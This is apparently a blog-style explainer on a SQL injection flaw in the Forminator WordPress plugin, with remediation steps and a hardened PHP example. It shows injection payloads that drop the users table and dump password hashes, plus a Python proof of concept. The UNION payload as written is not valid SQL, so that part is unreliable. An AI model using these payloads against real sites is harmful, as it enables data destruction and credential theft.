Forminator is a popular WordPress plugin designed to help users quickly build forms, polls, and quizzes. But in early 2024, security researchers discovered a major SQL injection vulnerability affecting versions prior to 1.29.3—tracked as CVE-2024-31077. This flaw poses a serious risk, especially to sites with multiple admins or large user bases.
Let’s break down what this vulnerability is, how exploitation works, and what you should do if you run Forminator. We’re using simple language with direct code examples to make this crystal clear.
What Is CVE-2024-31077?
CVE-2024-31077 is a SQL injection vulnerability. In simple terms: it lets an attacker with admin access mess with database queries—potentially stealing, altering, or deleting anything stored by WordPress. Even worse, it can cause a site to become unavailable (a Denial-of-Service or DoS attack).
Affected versions: All Forminator versions before 1.29.3.
Good news: exploitation requires being logged in as an administrator. The caveat is that many WordPress sites have several admin users, so the pool of accounts whose compromise leads straight to this flaw is often larger than it looks.
References
- Original Japanese Advisory
- NVD Listing for CVE-2024-31077
- Patch Notes 1.29.3
Where is the Vulnerability?
The vulnerability is found in the way Forminator builds its SQL queries using user-supplied data from form settings. In affected versions, input isn’t properly sanitized, so malicious SQL can slip through.
Typical SQL Injection Weakness
// Simplified example vulnerable code (hypothetical)
global $wpdb; // WordPress database handle
$sort_order = $_POST['sort_order']; // No sanitization!
$sql = "SELECT * FROM wp_forminator_forms ORDER BY $sort_order"; // attacker-controlled text lands in the query
$results = $wpdb->get_results($sql);
If an attacker can control $sort_order, they can inject arbitrary SQL.
Supposing you have admin access (or compromised an admin account), you can send a POST request like:
POST /wp-admin/admin-ajax.php?action=forminator_get_forms
Cookie: wordpress_logged_in=...;
Content-Type: application/x-www-form-urlencoded
sort_order=field_name; DROP TABLE wp_users;--
The above would (in a vulnerable version) cause the SQL query to look like this:
SELECT * FROM wp_forminator_forms ORDER BY field_name; DROP TABLE wp_users;--
Result: The wp_users table is deleted, locking every user out and crashing the site.
You could use an injected SQL UNION to dump data from any table:
sort_order=field_name ASC; UNION SELECT user_login, user_pass, 1,1,1 FROM wp_users;--
This allows you to (potentially) read usernames and password hashes.
What Is the Real-World Impact?
- Data Theft: All user/visitor data stored in the WordPress database could be read by an attacker.
- Data Manipulation: Attackers can alter form data, poll results, or even critical WordPress settings.
How Can I Fix or Detect This?
1. Upgrade Immediately
Update Forminator to at least version 1.29.3 (latest versions are always safest).
2. Audit Admin Accounts
Since the vulnerability needs admin access, make sure there are no unnecessary or obsolete admin accounts.
3. Check for Signs of Exploitation
Look for unusual activity in your database (missing tables, changed settings), and inspect your WordPress logs for unexpected AJAX requests.
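For plugin developers, the code-level fix is the one the hypothetical snippet above lacks. Below is an added example written for this article, not Forminator's actual code or its 1.29.3 patch: the vulnerable version beside a hardened one that allowlists the sort column and direction (the column names and the stubbed `$wpdb` are assumptions). WordPress 6.2 and later also offer a `%i` identifier placeholder in `wpdb::prepare()`, but an allowlist remains the simplest check.

```php
<?php
// Added example, not Forminator's own code: the article's hypothetical vulnerable
// snippet beside a hardened version. A column name or sort direction cannot be
// bound as a prepared-statement parameter, so the fix is an allowlist of known
// identifiers, not escaping. $wpdb is stubbed so this runs from the CLI without WordPress.

class FakeWpdb {
    public $last_query;
    // Minimal stand-in for wpdb::prepare(); only the %d placeholder is used below.
    public function prepare($query, ...$args) {
        return vsprintf($query, array_map('intval', $args));
    }
    public function get_results($sql) {
        $this->last_query = $sql;   // record the SQL instead of running it
        return [];
    }
}
$wpdb = new FakeWpdb();

// Vulnerable, as in the article: the caller-controlled sort expression is
// interpolated into the query verbatim.
function get_forms_vulnerable($sort_order) {
    global $wpdb;
    return $wpdb->get_results("SELECT * FROM wp_forminator_forms ORDER BY $sort_order");
}

// Hardened: the column must match an allowlist (assumed column names), the
// direction is reduced to ASC/DESC, and the numeric LIMIT goes through prepare().
// Anything unexpected falls back to a safe default instead of reaching the database.
function get_forms_hardened($sort_column, $sort_direction, $limit) {
    global $wpdb;
    $allowed_columns = ['id', 'name', 'date_created'];
    $column    = in_array($sort_column, $allowed_columns, true) ? $sort_column : 'id';
    $direction = strtoupper($sort_direction) === 'DESC' ? 'DESC' : 'ASC';
    $sql = $wpdb->prepare(
        "SELECT * FROM wp_forminator_forms ORDER BY $column $direction LIMIT %d",
        $limit
    );
    return $wpdb->get_results($sql);
}

// Feed the article's payload to both versions and compare the SQL each builds.
$payload = 'field_name; DROP TABLE wp_users;--';
get_forms_vulnerable($payload);
echo "vulnerable: {$wpdb->last_query}\n";
get_forms_hardened($payload, 'desc; DROP TABLE wp_users;--', '10; DROP TABLE wp_users;--');
echo "hardened:   {$wpdb->last_query}\n";
```

Run it with `php` from the command line; the hardened query contains only the default column, a bare ASC and an integer limit no matter what the three arguments hold.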
Proof-of-Concept Python Exploit
> ⚠️ Warning: Do NOT use this code on sites you don’t own!
import requests

url = "https://yoursite.com/wp-admin/admin-ajax.php?action=forminator_get_forms"
cookies = {
    "wordpress_logged_in": "your_admin_cookie_here"
}
payload = {
    "sort_order": "field_name ASC; UNION SELECT user_login, user_pass, 1,1,1 FROM wp_users;--"
}
resp = requests.post(url, data=payload, cookies=cookies)
print(resp.text)
If your site returns usernames and password hashes, you are in danger. Patch now!
Summary & Remediation
CVE-2024-31077 is an example of how a simple coding mistake—failing to sanitize input—can have wide-reaching consequences. While only admins can exploit this directly, the risk rises sharply if admin accounts are compromised.
Further Reading
- WordPress Plugin Directory: Forminator
- General Guide: How to Defend Against SQL Injection
Stay safe and keep your plugins up to date!
*If you found this analysis helpful, please share it with your fellow WordPress admins. CVE-2024-31077 is a real-world reminder that security is never “one and done.”*
Timeline
Published on: 04/23/2024 05:15:49 UTC
Last modified on: 08/01/2024 13:50:46 UTC